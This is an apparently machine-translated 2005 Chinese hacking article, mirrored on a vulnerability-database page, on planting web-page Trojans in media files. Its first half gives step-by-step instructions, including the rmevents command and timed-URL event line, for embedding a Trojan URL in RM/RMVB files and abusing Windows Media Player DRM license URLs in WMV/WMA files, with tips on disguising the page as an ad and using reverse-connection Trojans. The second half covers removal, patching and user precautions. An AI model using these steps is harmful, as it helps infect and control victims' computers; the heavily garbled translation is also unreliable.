Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
myhack58佚名MYHACK58:6220054039
HistoryOct 25, 2005 - 12:00 a.m.

Harm to huge media files Trojan offensive and defensive combat(photo-vulnerability warning-the black bar safety net

2005-10-2500:00:00
佚名
www.myhack58.com
11
JSON

Today, the network circulating most widely used media file there are two types, one is RM, AND RMVB file, and the other is WMV, WMA files, due to their streaming media good support, make the network of movies, music and other media files are used almost the two kinds of media file formats, therefore, if the media file embedded Trojan, then the media file Trojans unique concealment will make the victims unknowingly is Web Trojans against the dangers evident.

**Tapping: media file stallion in the invisible

RM, RMVB was added to the Trojan**

Helix Producer Plus is a graphical professional streaming media document production tool, we can use Helix Producer Plus This software the other format files into RM or RMVB formats, of course, also be on the existing RM files to re Edit, Edit at the same time, we can put the pre-prepared web page Trojan inserted therein. So long as the open this edited media file is inserted therein webpage Trojan will also open, we can even control pages Trojan open time, let the page Trojan more subtle.

Step 1: First download the Helix Producer Plus, all the way“Next”to complete the installation, then we’re looking for a put web page the Trojan is inserted in which the RM movie files, The it was renamed the film. rm, and then copied to the Helix Producer Plus installation directory of the RealMediaEditor folder.

Step 2: We in this folder create a new text document, 命名为test.txt in the test. the txt file write this sentence command:“u 0 0:0 7:0 0 0 0:0 7:3 0 http://www.***. com/index.php”which command is meant when the media file playback to the first 7 minutes after the trigger to open the URL of the event, and then to 7 minutes 3 0 seconds when the end of the event, the rearmost is the URL of the web site, we can put this URL into our web Trojan address on the web Trojan the production and the setting has been repeated description will not be repeated here, so can someone else see the media file when open a web page of Trojan, so he unknowingly caught such as Figure 1)。
!
Tips: for making the web page the Trojans should try to concealment, and mimic the normal web page, otherwise in see the media file when a sudden pop-up web pages who will have doubts, of course, put it into a similar advertising page works best, others will think is advertising, then off, and then we have a stallion success. For the Trojans the choice should try to use a reverse connection Trojan, such as dove gray, or even had hundreds of chickens, one by one, go to the connection is also very troublesome.

Step 3: run the CMD(command prompt, and enter the RealMediaEditor folder, enter the command:“rmevents-i film. rm-e test.txt -o film2. rm”this is the most critical step, meaning that the use of the Helix Producer Plus comes with the rmevents. exe the test. txt this trigger URL the event merged into the film. rm, and save as a film2. rm. This new generation of film2. rm is what we need with a Web Trojan media files as shown in Figure 2)。
!
WMV, WMA was added to the Trojan

For WMA, WMV file, we can use its default player Windows Media Player“Microsoft Windows Media Player Digital Rights Management to load any web page vulnerability”to insert the Trojan. When we play has been inserted into the Trojan the malicious file, the player will first pop up a prompt window, the description for this file through the DRM-encrypted need to pass the URL to verify the certificate, and this URL is what we pre-set a good web Trojan address, when the user clicks“Yes”for verification, we will stallion success. And RM file stallion, like in a WMV file to insert the Trojan we also need the same tool-WMDRM encryption package, This is a Can of WMA, WMV DRM encrypted files, the software itself is in order to protect the media files of the copyright, but in the attacker’s hands, has become the hacker’s accomplice.

Install the“WMDRM encryption package”, after the completion of the run, the software interface is very simple, such as Figure 3)。 First there is the“custom package”tab, we click on“source files”to the right of the Browse button, select a WMA or WMV file, then we in the following“output directory”select the Generate malicious files to the Save path, and then in the“output file suffix” to fill the generated files a suffix, recommendations and source documents consistent. After the completion of our switch to the“authentication string”tab, in“authentication URL”field enter our web Trojan address, such as: http://www.***. com/index.php,other kept default. Then switch to the“custom package”tab, click on the“encryption package’button, planted with Web Trojan malicious media file is generated.
!
When the user opens the malicious media file, Windows Media Player will ask you to obtain the certificate, as shown in Figure 4, Click“OK”it will pop our page Trojan.
!
There is attack there is defence, we cannot stand still, any of their mercy, in fact, a malicious media file is not our imagination of so mysterious, as long as we grasp some of the clear web page Trojan horse small knowledge,you can completely prevent webpage Trojan run.

**Proof: a malicious media, T

RM, RMVB Trojan Removal method**

We The above text in the production of RM Trojan horse method, for example, 新建一个内容为空的文本文件test.txt then in CMD run“rmevents-i the presence of Trojan media files. rm-e test.txt -o film. rm”, so it can be used with the insertion of the Trojan in the same way to trigger the URL of the event covered off, then the output of the film. rm is not the presence of the Trojan and clean the media file.

If the command prompt does not familiar, we use the Helix RealMedia Editor to remove web Trojan. Open RealMediaEditor folder under the rmevents. exe file, its interface is shown in Figure 5, 同样新建一个内容为空的test.txt then in the Helix RealMedia Editor menu bar, click“Tools”, select the“Merge Events”in. 接着 选择 我们 刚才 创建 的 test.txt click“OK”. Finally select the“File”menu in the“Save RealMedia File”to save the media file can be, its principles and use rmevents. exe remove web Trojan the principle is the same.
!
**WMA, WMV Trojan Removal method **
Since this is using the Windows Media Player vulnerabilities, so we cannot clear media files for malicious DRM encrypted information, the only thing we can do is hit a good patch, a malicious WMA, WMV files to the printer through the patch of Windows Media Player will not play a role. Patch download address: http://www.microsoft.com/technet/security/

In addition, we also can choose other player to play Media files, such as storm video, Mplayer, etc., some in the media file inserted in a web page Trojan horse events in front of them will not work, so this can also in some extent against the media web Trojan.

Safety depends largely on the user’s safety awareness, only security awareness to reduce the recruitment of probability, such as do not open unknown media file, the involuntary into strange websites, etc., of course, the light has Safety awareness is not enough, we also need antivirus software and other good helper, after all any web Trojans are all you need to download to a local to run, and antivirus software can prevent the Trojan to run, so we must be timely upgrades antivirus software and the virus database. Only Defense prior to the attack, to claim to be the real security.

JSON